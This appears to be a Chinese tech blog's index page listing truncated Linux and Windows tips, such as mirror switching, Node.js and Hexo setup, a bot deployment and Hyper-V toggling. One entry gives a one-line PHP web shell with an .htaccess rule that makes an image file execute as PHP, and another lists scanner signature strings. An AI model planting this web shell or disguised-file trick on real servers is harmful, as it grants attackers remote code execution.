ubuntu一键换源 Linux bash <(curl -sSL https://gitee.com/SuperManito/LinuxMirrors/raw/main/ChangeMirrors.sh)
解决apt永远卡死 Linux 编辑/etc/wsl.conf [boot] systemd=true sudo mv /usr/sbin/telinit /usr/sbin/telinit.bak sudo ln -s /usr/bin/true /usr/sbin/telinit
常见扫描器 Linux WVS 带有wvs、acunetix_wvs_security_test、acunetix、acunetix_wvs等字样 Nessus 包含nessus字样 APPscan 包含APPscan字样 绿盟极光(Rsas) 包含nsfocus、Rsas字样 sqlmap 包含sqlmap字样 Nets
php一句话木马 Linux <FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch> 目的是让服务器把1.png当作php代码执行 <?php @eval($_POST['shell']); ?>
快速搭建个人博客Hexo Linux 操作系统:ubuntu-22.04.4 所需环境:Node.js(不低于8.10,建议10以上),git 环境准备 安装git: apt update -y sudo apt-get install git-core -y 安装Node.js: apt update -y curl
Nodejs最新版安装 Linux 系统:ubuntu-22.04 更新软件源(可选) sudo apt update -y 添加 Nodesource 仓库 curl -fsSL https://deb.nodesource.com/setup_lts.x | sudo -E bash - 安装nodejs最新版 sudo apt
Yunzai-bot v3部署 Linux 搭建 环境:ubuntu-22.04 sudo apt update -y curl -fsSL https://deb.nodesource.com/setup_lts.x | sudo -E bash - sudo apt install vim redis nodejs redis-s
Windows开启和关闭Hyper-V指令 Windows 开启 bcdedit /set hypervisorlaunchtype auto 关闭 bcdedit /set hypervisorlaunchtype off 开启状态可以使用windows的linux子系统,关闭可以解决ensp路由启动报错,两个软件冲突⚠️ 详细用法 按下